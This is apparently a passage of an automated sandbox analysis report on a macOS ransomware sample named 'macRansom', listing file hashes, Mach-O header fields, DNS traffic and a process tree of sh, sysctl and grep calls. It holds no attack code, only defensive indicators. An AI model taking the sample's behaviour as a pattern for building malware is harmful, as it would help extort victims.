  • SHA: 2ACE58A7A4A583DD0CF17446CC83DBF2B3EB046D
  • SHA-256: D496EFCD22F81F9448A4ACAB6E353B144A804A6ED91AB92D37682B6E17EB7D8C
  • SHA-512: BB9BCE6D13FBD53A5BD49AD1B2471D8012B43E0511DACBB01CF4AA5653B1D1FF0C9C16627B6BE7C13B011D54817A252E87FB743A0DD0953FAF98B9533B2E0CEB
false
/private/var/root/Library/Caches/com.apple.helpd/Cache.db-shm
  • Type: data
  • MD5: E626A3B0035736E73981BAA8A8EB2C6F
  • SHA: 2AD4936BE6C04900E0D2A46F6EC8ADCCD038A94D
  • SHA-256: C0C7AD553098804C7D2E04BB3F952EFD481F2169B9F8B87A4F644744E2416088
  • SHA-512: 234FE0840152104270FC508C96A631C65DEB65923C9CF30F274B61E7221D9389E2B84B87E4D2E2589F81E396AA348D6E358DA2237B74FD315AB3B6963BA1348C
false
/private/var/root/Library/Caches/com.apple.helpd/Cache.db-wal
  • Type: data
  • MD5: 5FE61FD89E5832FE245F7562393016BD
  • SHA: 8BC8510840DECDCEC2C0E086B1EB9FC6D31AEA33
  • SHA-256: C937776EC15E75BBFDF9D640F0165309790CA3DE3788199B99931E5207BA56EF
  • SHA-512: 7A650A12AE68D7B24F2D6E0B6459FE459091F82635AE38F2EF5EB54250264721C82FF5811D20F6437D3D3C646D83E13C4095D960F24EBD7C262769485CC7A804
false
/private/var/root/Library/Caches/com.apple.helpd/HelpCache.plist
  • Type: data
  • MD5: 94B8D3427D0243183C8074E636A6CDDD
  • SHA: 91229F46D19D87216050EE913B5215E9AB603F87
  • SHA-256: 64DE0C71A8B294D3DBA4722814BB3C10E7522C3817FDA2E8405F05DC377F7668
  • SHA-512: CA3880FE9AAE7E4E5E2B18269E216B3063CF15DDEE0A926526DD7E145BC3728F805FF2EC728EA885E6870D27482652EB595F2EF7A14C2DC8EBF9632277BB4126
false
/private/var/root/Library/Caches/ocspd/Cache.db
  • Type: data
  • MD5: 3C182924DE61A8F7FC60A36988F330AD
  • SHA: 2ACE58A7A4A583DD0CF17446CC83DBF2B3EB046D
  • SHA-256: D496EFCD22F81F9448A4ACAB6E353B144A804A6ED91AB92D37682B6E17EB7D8C
  • SHA-512: BB9BCE6D13FBD53A5BD49AD1B2471D8012B43E0511DACBB01CF4AA5653B1D1FF0C9C16627B6BE7C13B011D54817A252E87FB743A0DD0953FAF98B9533B2E0CEB
false
/private/var/root/Library/Caches/ocspd/Cache.db-shm
  • Type: data
  • MD5: A9035037CC8CF288CA44FEBDCAE17497
  • SHA: 759CF54CC3788CD245BB023FA6EB5C070EE0F767
  • SHA-256: 2F6D1CF1A251AD24C73C39A3EA71592A078D57B0F357574ABDA942E9B05B7182
  • SHA-512: 848EEE6EA95C25CB3D2D171C04CF8D812D6D5ACDC933AA54E84D0E052BE82BF18805A6EA5C275939E99C74CE132064E78E16FD7134306CD773FCCF646C97C7FD
false
/private/var/root/Library/Caches/ocspd/Cache.db-wal
  • Type: data
  • MD5: 8466611F95D448B840A7FC3381A8ADE7
  • SHA: 71D3F85E2CD93C23E05F0BD4C09A4767F43DA3A2
  • SHA-256: 55E51F6B0BA0443E436A577B9F72B0949981316577931BDE56326624A61BED91
  • SHA-512: 85FAAEBC6169DC1B176AFFB1C1A06710277ED27DEA0AA81D7FC73E54716E74E0628403DF0244A5EAFB6E5456D99C4C0117F8779CA13069BB79CC291627DE2E0B
false
/private/var/root/Library/Caches/ocspd/fsCachedData/CDB03578-F4A8-49EE-B99A-33A209D86C93
  • Type: data
  • MD5: 53FCB0675B619803D09F25653B7B31BD
  • SHA: 8000C4271A30BE194269C88FE84A48AC13CA6A2C
  • SHA-256: E0651675044100162F065ADDDF26AEDF35902997E3B528B783BE9AAD9EE7BD36
  • SHA-512: 50E799FD9ACEA0C2D3113D62BA8DCAB917B20301EFFDC13560CFD8F6034040BE89E77B126E2756D1922DDBC803ABE0D62297D3A3A9E57B5A8717C18A6486940A
false
/private/var/root/Library/Containers/com.apple.ctkd/Container.plist
  • Type: data
  • MD5: 5155D8078A4ECD3817E4CE24B5E1E887
  • SHA: D6C9D35B014537EB306B7C60CC8EB9EC753C2E3A
  • SHA-256: B065E90397C4C3C7DDE6D5558B5C351C3F6C485224CA71E3671725AF0981182B
  • SHA-512: 8FAEA32CBBED70AC2C521E2A4E54A94413746ADF260D870A08C299FF79DC9BAC57E091ED5C75E1ED6236B0D55AFCF5E51AF98E718940B98DEA4C94FD5B7E268A
false
/private/var/root/Library/Cookies/Cookies.binarycookies
  • Type: data
  • MD5: 7988911C8387C46E4236D062DBE71673
  • SHA: C35E39870A08BE783ED69C413F9528A3D0FF234F
  • SHA-256: E02513B83F28C7E593CE3CF4CDB14037E8A097362617554157FEE885336DD75F
  • SHA-512: BAF5E16606E298CCC132ECD32B042B3AC7465C31F89D89BAC4A12C1AE38E61E980350541875C81B9A7C74DED965D4491DC49BE510F45F6B1D0D35176C7D7B75C
true
/private/var/root/Library/Dictionaries/CoreDataUbiquitySupport/root~DEA8634C-C56D-5029-9166-DA4F3394154C/UserDictionary/local/store/UserDictionary.db
  • Type: data
  • MD5: 13E7DD89608B7FFE215122CE685D693B
  • SHA: 113E0CF48C79916DC5A9E14F67D431C1EED972C6
  • SHA-256: FDFC22310D8C4B21E0C466B4E1090FFD82C3F4AD49B6BA26FF1EB9EBD3497618
  • SHA-512: 3791032E0C3C7C1450168191E5A1B3027A8B7B3DE5448515ACCA31D4924AFC9C1D2281BB8259654AAE792835174FD4B2231BCD91E0F6CAC56CEF679CF66237D4
false
/private/var/root/Library/LaunchAgents/com.apple.finder.plist
  • Type: data
  • MD5: 85670F9E9BCBC70A6452F0A48E96ACE0
  • SHA: 0C077C8EB76A4E7A8DD6619B287EFA362D6B31EC
  • SHA-256: CC894F29B8DF0502C295B293C5A6840038BCF3C0457467336126759DB7DE5744
  • SHA-512: B90EAE4091F5CCE77FAD92F12F04DD9CA05DE6E468AFDD3AFCC2AC525C7B3F27BF0A7EB2B0DFDF076A892EBAE0DD078C0BC804F5C63E1FBA55AA034EF3B723E7
false
/private/var/root/Library/Preferences/.GlobalPreferences.plist
  • Type: data
  • MD5: 9F08594F519E580D73C175941024A45D
  • SHA: 189364B4E2CCA6BD3EFA3DDC462B96290C09C8F5
  • SHA-256: 975FAA9D7F3143737F41FD9565044628AA1E66E0823E7EA5660B1954545EA976
  • SHA-512: D58F3248E739C7EDEF1FE8241CDDF3CE9AAB9CE219EB43DAFC6BB95C80C2670186C4AD3F3CFACB8857AF406542CE6C9B2F5B5FC61D72BE184DE61813BE3D4709
false
/private/var/root/Library/Preferences/ByHost/com.apple.HIToolbox.DEA8634C-C56D-5029-9166-DA4F3394154C.plist
  • Type: data
  • MD5: B9B18C5C68B25ED588E148C972D6DC42
  • SHA: BC48BFC3130F7CD57C116A5065FE7CD02F619472
  • SHA-256: C648FF21FD69E1D0CE07F1CDCF7FF2CC16EEA83D34532ABF5F627F8993A91A88
  • SHA-512: 91520BF5A0FC4056A56D942C747E38101D5EDD6559E8E7915EAB5E2EC02B7A61E2472B3C44D2B2CEFF2F63613C7DFA8BD4BAAFD319B8E64F49C6F9CE8F66A443
false
/private/var/root/Library/Preferences/ByHost/com.apple.QuickLookDaemon.DEA8634C-C56D-5029-9166-DA4F3394154C.plist
  • Type: data
  • MD5: 42A31C54CA4260AC9BD940F5105226FD
  • SHA: 8ABB26B8621B5F8DC136C7FBFCB795DB137DDC34
  • SHA-256: 33D88DDE5FF78E30177C75EC54D1E2B8DA57AF95F34FA8A8284FF65AE7E9B3B2
  • SHA-512: 6862E447F4C7AA266C2253FFF4F2DFCCFD3FB3FB660642AC1AFC086520BE602486995C67C48D13C06F140D4D4E0515EF2B3F2D65DB89C243163D337F257E2AF1
false
/private/var/root/Library/Preferences/ByHost/com.apple.coreservices.appleidauthenticationinfo.DEA8634C-C56D-5029-9166-DA4F3394154C.plist
  • Type: data
  • MD5: E827CF3517604158100C4380BC68A2CC
  • SHA: B96A3F131AC6EAC4D9FC50E26E129CC9BD4887C1
  • SHA-256: 82E8D0C79FC1D38945EBE13EB458BFCD6502596651AAEB594FBD4805E8C05F57
  • SHA-512: 70CBFDBD7C3BB25E8E5EA5AB55F64AB335EF226F241342D967EF1D5ACB587BCB528D202F0DD43DE4A8160D867B473F64B4256868A200820542AD5ECFAA35E54E
false
/private/var/root/Library/Preferences/IOBluetoothUSBDFUTool.plist
  • Type: data
  • MD5: 98AF7384D76024CEA1733B87DFE156ED
  • SHA: F5299C539361944DAB45FFF7DED078455F100BEC
  • SHA-256: 8EC6718B51A65AA19F7FEA3B93AB46BDB76028ADD02418433E31871C6AC07040
  • SHA-512: 517B421695D920E9A636A272B2D61EA3D5494553CB1CFC9B582671CA99999C3C3976258FACA5BA02A219190F395F729F5E33EEB3C0B22DE8FC310E303B6ECC19
false
/private/var/root/Library/Preferences/blued.plist
  • Type: data
  • MD5: 9835CB4535C03E533DB2B9492BF955FF
  • SHA: 456A6A4762D3B667344165BCD50FF7FF90111700
  • SHA-256: FA457A919525E89828A03BEDE5C877F1AA4A178175857DCC0E6D5455E73F3EA8
  • SHA-512: 5266234B5C32FC7DC2CC3DAA339D6DE90B876C681FD285A29BF8BE895D95369E14DD495968B8EEF0229A6BFF793CEE1DBC12E6BCCEAA7367AC548B6264CFC733
false
/private/var/root/Library/Preferences/com.apple.AOSNotification.plist
  • Type: data
  • MD5: B934589AE4C9F306B71E7203690B7C80
  • SHA: C90FC0E0A73BC18E9300539A50F22AF01E508FA4
  • SHA-256: DC40F91CF7506BE0C553A56EBAC95B0ED15988176617768A592BFE6B261C3D03
  • SHA-512: 281F182CD59C1C346F8C7FCCD21B81AD60BFB5FEAF1183CF67B90D108A98CF447FD61200D7146B7E285BE46707EA83DA558911E3D5DFCA4043DB445873AB987E
false
/private/var/root/Library/Preferences/com.apple.AppleMultitouchMouse.plist
  • Type: data
  • MD5: B142B9D9C2D3620CC3A8676065345FB2
  • SHA: D5D5121B4AA6FF0DFF600A5229AF3E50F6C5306D
  • SHA-256: 614D6AC8476F05C15AFABD40B6433FB8F18D94AB45F2DD21A4DC53167776B8BD
  • SHA-512: 53208E49AF47C0BD01FC334728965C70D2381071EE3860141A970E1904C2B383C1F419D804CF06EDDE6D3911F11B05A7D443EF3F516F3EE5A6CCA1B5D124A8C7
false
/private/var/root/Library/Preferences/com.apple.AppleMultitouchTrackpad.plist
  • Type: data
  • MD5: BDC6456F32FA35CD1CEBEEB742872DFE
  • SHA: D4F44CBF8A0AF8FCA5E5E2A880A335EAC67E6001
  • SHA-256: 1D8282D3A36E5EBB52894DB0DFF4D09D94E1CA00A396C097794119E00079BA95
  • SHA-512: F73A40AF34F029DD3852BAFCD401C85479CD1CCB93135FFA290C9F945AFEBEC2D4FAE7D01E4DA2853F603C1080785565DF4B5280CC839473C52FFD52E281180B
false
/private/var/root/Library/Preferences/com.apple.CoreDuet.plist
  • Type: data
  • MD5: A00E24F391E26A6D29D49BAD22724F76
  • SHA: A789034B354756E17810871116C1E8BA65575955
  • SHA-256: 3DD952DDE340AAF7989CB1403B832085E66DDCAB9CD853BD8FCA76D84D6AC836
  • SHA-512: EC9AAC3661848B1D2D47A792B13362ECCB86E1C3B9DEA6524621FA67A44CBA9A3C58DD54276B061D089A707CAD97FC7AFAA3382A6BBF59932B1C8523980B306E
false
/private/var/root/Library/Preferences/com.apple.CoreGraphics.plist
  • Type: data
  • MD5: 24F63C61170C6F23A51910941F805516
  • SHA: F0913C5376AB37C76522F1D140AFD8E0046E66B9
  • SHA-256: 39900F251D4BFC6BE6783A0114A2B70D181F9E9E8B40C5A38FCF41CA341102AF
  • SHA-512: 970A57E3753CCD1A5C27EEAC625649616DB2B7560C837750B2720E910E5E7D45D2F76661D8673B65C8D1FB6E722196E2B9C896D45C0B8A4F3A57678CFE1979A8
false
/private/var/root/Library/Preferences/com.apple.CrashReporterSupportHelper.plist
  • Type: data
  • MD5: E0647B774CE6FDAFC03D9D42B9E2D839
  • SHA: 9970478F6BC237BC406F8DC0B2A03E025B2A23E3
  • SHA-256: C5F0BCBF8B88ADF4CCD4ACCE5C29F93CF0E04ED6FEDE01EE0A6E4B47110ED632
  • SHA-512: E5A4F0BE8AC2B7F9272C350D0BECB5E0105D91F4DBE16C085D6CF549AFED3D32169CF8F56F8D41817ED5C38FCCAF2829140723AEB35CB9D02448DB1CC72E74CF
false
/private/var/root/Library/Preferences/com.apple.HIToolbox.plist
  • Type: data
  • MD5: 56D4AF33C3D001219A863C107CDFE753
  • SHA: 77415B0E4E251C96225009EE4754179BCB6FE1E0
  • SHA-256: 08F4353D285967C04E3A92F211870F96705FFCCE6AAADBAA466DAE6DB4699817
  • SHA-512: 7FB0CED9714B5233A9BA792C47756F4CE8ED7C8632F1539656FC17202A21AB884C18E6E84CE1513D950C7980679B93A8EA2EF9D1E74DB7FDFA8004909878212D
false
/private/var/root/Library/Preferences/com.apple.InputMethodKit.UserDictionary.plist
  • Type: data
  • MD5: 6F9501F93A39CDB2CF9A6A53E5378CD9
  • SHA: 0BA40719FF5ED8C1FD95456965F1022C2CF471E6
  • SHA-256: 8CCE01760943221E38E993E5254A07ECF419C20D5A6860806C2FE64AFFD01A3E
  • SHA-512: 233EAE7475EE6AD0030B61420246963F91C73CBA5FE27A7F3A1F763D497AEEAC8E7F190D0860F33B6EB3B89B1B264150BCAD6D2DA1EA361F563E258A3767081A
false
/private/var/root/Library/Preferences/com.apple.LaunchServices.plist
  • Type: data
  • MD5: 3AFD293B4D4EE9BA8F5F2E020D56FDB0
  • SHA: 5D036E27B7C8797C1AEBA5F21787E097A329506F
  • SHA-256: 477F59E402E8B66C592532AF09002D7510B83951D0F8528EC804C9EE9BCAC2DF
  • SHA-512: D313FDF6B64825C674CD0B87900196F879F69FBCFD712F146847608CF946C59FA1C3F0092568205E19328940D7C5EDFDEECCB8B1FB4E3D08977020BB5C652EB2
false
/private/var/root/Library/Preferences/com.apple.QuickLookDaemon.plist
  • Type: data
  • MD5: F83DAABD122A661D227802160A4FC89F
  • SHA: D465FCB9756949F2AEECA6B58B3DDDB5A9D0C35A
  • SHA-256: D4E7A689C4231B7DD6D38BB3C375232A7CD1557622260F2602C6C899A332ADE8
  • SHA-512: 425236F61E1A3B73695A3B045141AA43FD0729C14FE13E7BA27F8DBB0D4527BBB2F9D360D5A95386110E4A713E808753125CDDE6510DFE374FE6FABCCF1224C4
false
/private/var/root/Library/Preferences/com.apple.WirelessRadioManager.debug.plist
  • Type: data
  • MD5: 4DF40D1DB9EC958B3D203BD45C405C84
  • SHA: F37088C4E4412D6B6AAA8219128BE254592FE6C6
  • SHA-256: CBFA183FD750F92D01B38833B2FB9649F4350421740D27294A81D79C7FBA10B5
  • SHA-512: 87BF2D40293D4EC6B1329D909DFF54CBF8F37976525E32949C45CC263BEC42F6AFD243A44F4A82BE4FE909CF81A407DE85AEFB484C29DD3677AB7F1112420998
false
/private/var/root/Library/Preferences/com.apple.airplay.plist
  • Type: data
  • MD5: B597D98E216B8B19E2869C3BE352CEE2
  • SHA: B3D0D93E4C904DB5AEF50EA8A71A436DA38FB716
  • SHA-256: 08222D64A6CFE75882C8B00D52C3987BF93DC83075ACEF765662DE369A255A5D
  • SHA-512: 95CDB5861F1157F99764CEC9884540F58359DAB7FBB841C1DD58692C891414C99FE9EFE5BA3CA0DFBD974A085F52E991B43D4381C5FF684C360C1B77BADD9686
false
/private/var/root/Library/Preferences/com.apple.awdd.persistent.plist
  • Type: data
  • MD5: 5718479E0272DFBA3F2697B1A30BB981
  • SHA: 25FABAD43499471B575F1179F52C87B1BBFCD6CC
  • SHA-256: 2B1A27DA511FE34AD59668CDD186028270356775C1ED3B072D6BB4818B734A59
  • SHA-512: 7C207E1542A94C47F5C192EB190268A18134E35ED8626EE83BE046FA35BFE806B79D90564E570483ABA244602DD98FDE6824759159073B9A7DF1C1B4DE0DEA6A
false
/private/var/root/Library/Preferences/com.apple.blued.plist
  • Type: data
  • MD5: 9835CB4535C03E533DB2B9492BF955FF
  • SHA: 456A6A4762D3B667344165BCD50FF7FF90111700
  • SHA-256: FA457A919525E89828A03BEDE5C877F1AA4A178175857DCC0E6D5455E73F3EA8
  • SHA-512: 5266234B5C32FC7DC2CC3DAA339D6DE90B876C681FD285A29BF8BE895D95369E14DD495968B8EEF0229A6BFF793CEE1DBC12E6BCCEAA7367AC548B6264CFC733
false
/private/var/root/Library/Preferences/com.apple.cache_delete.plist
  • Type: data
  • MD5: 677265B1E6626A5B0A1D127208266B7A
  • SHA: BD41896DFCED37291EA682449B14316B28ED8EA5
  • SHA-256: B4475F94E0D7B2B5503E0D04D1BB3CF992F396A1853223F6971FE01E51D3D394
  • SHA-512: B461C85119D5C791FE71094FBD31BF83D463AFAEF92F55C852D4A031780C5286EFFC6A88F78F802438682066065FB419169068CA9BC7F359DA7DF5A28BBFF10F
false
/private/var/root/Library/Preferences/com.apple.driver.AppleBluetoothMultitouch.mouse.plist
  • Type: data
  • MD5: B142B9D9C2D3620CC3A8676065345FB2
  • SHA: D5D5121B4AA6FF0DFF600A5229AF3E50F6C5306D
  • SHA-256: 614D6AC8476F05C15AFABD40B6433FB8F18D94AB45F2DD21A4DC53167776B8BD
  • SHA-512: 53208E49AF47C0BD01FC334728965C70D2381071EE3860141A970E1904C2B383C1F419D804CF06EDDE6D3911F11B05A7D443EF3F516F3EE5A6CCA1B5D124A8C7
false
/private/var/root/Library/Preferences/com.apple.driver.AppleBluetoothMultitouch.trackpad.plist
  • Type: data
  • MD5: CC0702159ADB660EF2E51E158CEC80BA
  • SHA: D0236E04DAB1485818BFF2196E9274AEA787E056
  • SHA-256: E70CA7E845214B6F9E6050D8BCAEFAEE4544EAFD498D1D4595FD26D65B606463
  • SHA-512: 1054BD1DC77EAE36A71968F6400D81D5E521A23CAF556C656A771765379A9828A77AFDEC7FF90315CEEFE5DBA5B52E4DD517C24B8A3B0708816BA49A3EF0D1E9
false
/private/var/root/Library/Preferences/com.apple.driver.AppleHIDMouse.plist
  • Type: data
  • MD5: B6283FAABB3BF4257291795A76D3EE5B
  • SHA: 69FC0144CFAD59A4624EF63B2FECB107CA951FD9
  • SHA-256: 15628B5E771B491517B73FC8CE3BB9E3522959702013B192CAB06AE24C32E94A
  • SHA-512: 1A6F9561B40E3033E5C0631CA11941198405472E7F304C7852711E9AB119DD5107663A68F67EAEFFCECC501A3BE7362EA4A085A38788B9F7650C0D2B4EA63BAE
false
/private/var/root/Library/Preferences/com.apple.icloud.findmydeviced.plist
  • Type: data
  • MD5: E0855510A1118CCE8CCCFA57337A9052
  • SHA: 442B1861251C91777FF5423563C6EA2A97EB6690
  • SHA-256: 81DE2079135FA3B83326C3CD28A197812810CD9091BF54E88BCC7EA445AAFAD1
  • SHA-512: 03F681C3219B3ED892BF4B8111ED2EBB6A1670802027127DF35BF0C3D361A7B3C7EA3B9464709B00210E36A2FCD1253930B5E8E21AA93BAF1562401AD7ADC36A
false
/private/var/root/Library/Preferences/com.apple.java.util.prefs.plist
  • Type: data
  • MD5: 20B976E60D6AE748818A0007D1EF9DD6
  • SHA: 2B08F18C1D4FB5516971DFCBECD82EB83D7FDC3D
  • SHA-256: D922983B95887B60E94662BB17611D2BB1D41FFCCA96302635EE58E9A75BAEB7
  • SHA-512: 9AC660169C21B07BB8CF4A6C1AF2165A4DB2B5050BD7A73F8ACB8CDC4402D7F081C246408F96A7C6B8B32B3936AC238029E638A9A64D8492165F90F2FAEA9B13
false
/private/var/root/Library/Preferences/com.apple.recentitems.plist
  • Type: data
  • MD5: DA98DD2FA2CCFC565F2F247BBD2B02E3
  • SHA: BA7121630687815D3761EE6376A5094110FB325D
  • SHA-256: 47EDC7E5D703EAF4F9612FADE507D881D60D1495EE0FA435CC3B7CBE623FAF05
  • SHA-512: 2E85713A7F3E7C2973CFFDF62CA942936D78250B0EFEF19F477123802D5374F211F0546E766B23B97FF9A79A3829E0FB06326163A45653A6B4D73477AB60E2FF
false
/private/var/root/Library/Preferences/com.apple.stackshot.plist
  • Type: data
  • MD5: 08FD2FB67991B22F9E416223703EDA50
  • SHA: CA538F0B1A1722DFEF10659D459547086F8E7148
  • SHA-256: C86DDECF786FB7C33A47414D2D5E8EAD3055CD6F9B7FFDB411C0A318CED5B912
  • SHA-512: DFD16D8B7B868330F461AF32CFF9A5E5D11A3EBD1A2F5AA0E49F40EC9FF71939888F094594DFB776B6014842978B9A894DFC8C4EA8C69D97E0E2990A8681C5BE
false
/private/var/root/Library/Preferences/com.apple.systemsound.plist
  • Type: data
  • MD5: F53D8E2C87FE5492EB39917DD95EA19C
  • SHA: 7967ECAEEE48881B176D21C36237469C800F6A94
  • SHA-256: E1B40DD5A2423095601A8DE8AACE5553AE5E782E0803B975E5D44005A3D7DA0F
  • SHA-512: B7DC1E97A45F65323EA1E913A2D5C06E7A3EAA037F9A06C667A64E91BA6E4EB11F313F5A56D978CD31F0EB85E0231A7966D8A5262FA1D30673D319A94FAED256
false
/private/var/root/Library/Preferences/com.apple.universalaccess.plist
  • Type: data
  • MD5: 7450982A5990A8636354818C96AE4A10
  • SHA: BE752711A673E50CA2F03C323F6C19CADF3DDA71
  • SHA-256: 98B8730ADA82537E45FAEBC433054F55D187C852D2781C1CBBA25D9E6C4237CD
  • SHA-512: 072A406E3B998016276EEB45B7D15FD1179F39224853FF48DC450D8864E9E30BCBE3047DA5C39C47146BCC90795B65956B597CDCFAE4069DC898C3F201E510C4
false
/private/var/root/Library/Preferences/com.apple.wifi.keychain-format.plist
  • Type: data
  • MD5: DE23FF374EEECE4ACC64C43BA2B174D1
  • SHA: 371560FE17108211821234E9C7C2C6A8974EA557
  • SHA-256: 40B1EB6A6242B50B498A16CF7B7F94DF666F73AE437EE18BB65A808166BEBE45
  • SHA-512: 1CCC6816265EA6EF791F3044D9A69406CB5E401430057868F4A2C5E4E86FC9AB4729CED3BD07A2668B9E19FECFCA4A62F34B7B00A7655D42A19A3E6B862ED064
false
/private/var/root/Library/Preferences/com.apple.xpc.activity.plist
  • Type: data
  • MD5: 5A8FA1A7CC33DAC38BDB8D5B0C72935D
  • SHA: 3B1DFDFAD1C72F8B7CCB9D193E97B18A0BEF3413
  • SHA-256: D96B45C138072077D9E7DD380F111DFF69AF984CDF4D68D83C846227A8CE165C
  • SHA-512: 123EF40D75B4E44C7891C7D958201355224034E3B2DB5384694A1F205C3ECDFB19990C7751249A12ADDBF361C9F7C8DD3B722151174BC16FA6E8DEE96D2DD616
false
/private/var/root/Library/Preferences/com.apple.xpc.activity2.plist
  • Type: data
  • MD5: 3C2CC6D50EBC64E7B8018EF2A01ADCD7
  • SHA: 2EA863E7EE954EF70B0C609307B73895E00525C8
  • SHA-256: 2AB1F80102B9E704514EA8E98DC7A4D6CE81D8AAF31F61633C5D53BEF2200720
  • SHA-512: FB49DE6D5CFE992151E578792AFA11B08C996C155FD5DE56D4EA257F0C198B8737214CC4BF03F9A855A418E3AB21E0EF303E5D24FA8CD62754C2DD782715BF82
false
/private/var/root/Library/Preferences/com.oracle.javadeployment.plist
  • Type: data
  • MD5: 2E85615A3092ED50DED5E9C09327D93E
  • SHA: 2772C29A9B484BBDD327D7275F9FF644382DAAA7
  • SHA-256: B8A07D5A36C16C035C85F6BBFAC5D88E8A01FC488F6E948DFE5074E6315681D7
  • SHA-512: 9B67911298E913FB0A0FD1CFCAE238FE29212B5BA356B87DAE77476D80AF9A0ECD9CB7AD56EDF6713B63E3F2FC70D80D62970BCB42CBD2B2C80F7CAC3B13EB60
false
/private/var/root/Library/Preferences/systemmigrationd.plist
  • Type: data
  • MD5: 77B6F02E7105556726EB2E788FF7EF2A
  • SHA: 89F9CD35A2E7834BD678807EC20EA0912F5AE0CA
  • SHA-256: DA6C19B96E3CCD0CDA132916C0A44343A95A6FCC8E3151B13CC4E2E02949BBAD
  • SHA-512: AA322D0118ABEDA1B2B42100714BFA1DA336A6640EF724061C1133E87B89B4090AC9851F002A8BB7AA97D10D36A38346F6FA58E46C97C568C53E0E20D3BA2659
false

Contacted Domains/Contacted IPs

Contacted Domains

No contacted domains info

Contacted IPs

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs
IPCountryFlagASNASN NameMalicious
8.8.8.8United States
15169GoogleIncfalse

Static File Info

General

File type:Mach-O 64-bit executable
TrID:
  • Mac OS X Mach-O 64bit Intel executable (4004/1) 100.00%
File name:macRansom
File size:18492
MD5:8fe94843a3e655209c57af587849ac3a
SHA1:cf0743ed381ade69bba3d1dd3d357a8300bcd4ae
SHA256:617f7301fd67e8b5d8ad42d4e94e02cb313fe5ad51770ef93323c6115e52fe98
SHA512:258de01664edad7177ce8c0b74e6abaab2a7d54f2f0312a53754e537e5bf73170c6fbee8bef0e568eb12858b273f0f216c08c49ce36a61941f656ee53ef214e4
File Content Preview:.......................... .........H...__PAGEZERO..............................................................__TEXT...................0...............0......................__text..........__TEXT..................5......................................

Static Mach Info

General Informations for header0

Endian:<
Size:64-bit
Architecture:x86_64
Filetype:execute
Nbr. of load commands:15
segment_command_64
NameValue
segname__PAGEZERO
fileoff0
maxprot0
vmsize4294967296
nsects0
flags0
filesize0
vmaddr0
initprot0
segment_command_64
NameValue
segname__TEXT
fileoff0
maxprot7
vmsize12288
nsects5
flags0
filesize12288
vmaddr4294967296
initprot5
Datassectname__text
segname__TEXT
reloff0
addr4294971376
align4
nreloc0
flags2147484672
offset4080
reserved20
reserved10
reserved30
size6197
sectname__stubs
segname__TEXT
reloff0
addr4294977574
align1
nreloc0
flags2147484680
offset10278
reserved26
reserved10
reserved30
size228
sectname__stub_helper
segname__TEXT
reloff0
addr4294977804
align2
nreloc0
flags2147484672
offset10508
reserved20
reserved10
reserved30
size396
sectname__const
segname__TEXT
reloff0
addr4294978208
align4
nreloc0
flags0
offset10912
reserved20
reserved10
reserved30
size1280
sectname__unwind_info
segname__TEXT
reloff0
addr4294979488
align2
nreloc0
flags0
offset12192
reserved20
reserved10
reserved30
size92
segment_command_64
NameValue
segname__DATA
fileoff12288
maxprot7
vmsize4096
nsects3
flags0
filesize4096
vmaddr4294979584
initprot3
Datassectname__got
segname__DATA
reloff0
addr4294979584
align3
nreloc0
flags6
offset12288
reserved20
reserved138
reserved30
size8
sectname__nl_symbol_ptr
segname__DATA
reloff0
addr4294979592
align3
nreloc0
flags6
offset12296
reserved20
reserved139
reserved30
size16
sectname__la_symbol_ptr
segname__DATA
reloff0
addr4294979608
align3
nreloc0
flags7
offset12312
reserved20
reserved141
reserved30
size304
segment_command_64
NameValue
segname__LINKEDIT
fileoff16384
maxprot7
vmsize2108
nsects0
flags0
filesize2108
vmaddr4294983680
initprot1
dyld_info_command
NameValue
lazy_bind_size592
lazy_bind_off16440
weak_bind_size0
rebase_size8
export_off17032
export_size48
bind_off16392
rebase_off16384
bind_size48
weak_bind_off0
symtab_command
NameValue
strsize408
symoff17096
stroff18084
nsyms42
dysymtab_command
NameValue
extreloff0
nlocrel0
indirectsymoff17768
modtaboff0
nextrel0
iundefsym2
nmodtab0
ilocalsym0
nundefsym40
nextrefsyms0
locreloff0
ntoc0
nlocalsym1
tocoff0
extrefsymoff0
nindirectsyms79
iextdefsym1
nextdefsym1
dylinker_command
NameValue
name12
Data/usr/lib/dyld
uuid_command
NameValue
uuidf44af65c50973770ac7306a2f63c6ea4
version_min_command
NameValue
version658432
reserved658432
source_version_command
NameValue
version0
entry_point_command
NameValue
stacksize0
entryoff4080
dylib_command
NameValue
compatibility_version0.1.0
timestampThu Jan 01 01:00:02 1970
name24
current_version15362.214.4
Data/usr/lib/libSystem.B.dylib
linkedit_data_command
NameValue
dataoff17080
datassize16
linkedit_data_command
NameValue
dataoff17096
datassize0

Network Behavior

Network Port Distribution

TCP Packets

TimestampSource PortDest PortSource IPDest IP
Jun 16, 2017 18:07:03.904460907 MESZ5696753192.168.0.508.8.8.8
Jun 16, 2017 18:07:04.890048981 MESZ53569678.8.8.8192.168.0.50

UDP Packets

TimestampSource PortDest PortSource IPDest IP
Jun 16, 2017 18:07:03.904460907 MESZ5696753192.168.0.508.8.8.8
Jun 16, 2017 18:07:04.890048981 MESZ53569678.8.8.8192.168.0.50

System Behavior

Analysis Process: mono-sgen32 PID: 686 Parent PID: 641

General

Start time:18:07:04
Start date:16/06/2017
Path:/Library/Frameworks/Mono.framework/Versions/4.4.2/bin/mono-sgen32
File size:3722408 bytes
MD5 hash:8910349f44a940d8d79318367855b236

Chronological Activities

Analysis Process: macRansom PID: 686 Parent PID: 641

General

Start time:18:07:04
Start date:16/06/2017
Path:/Users/vreni/Desktop/macRansom
File size:18492 bytes
MD5 hash:8fe94843a3e655209c57af587849ac3a

Chronological Activities

Analysis Process: sh PID: 687 Parent PID: 686

General

Start time:18:07:04
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: sh PID: 688 Parent PID: 687

General

Start time:18:07:04
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: sysctl PID: 688 Parent PID: 687

General

Start time:18:07:04
Start date:16/06/2017
Path:/usr/sbin/sysctl
File size:60608 bytes
MD5 hash:6b5514b612e9e7ea63857c6fdcab2c5b

Chronological Activities

Analysis Process: sh PID: 689 Parent PID: 687

General

Start time:18:07:04
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: grep PID: 689 Parent PID: 687

General

Start time:18:07:04
Start date:16/06/2017
Path:/usr/bin/grep
File size:33712 bytes
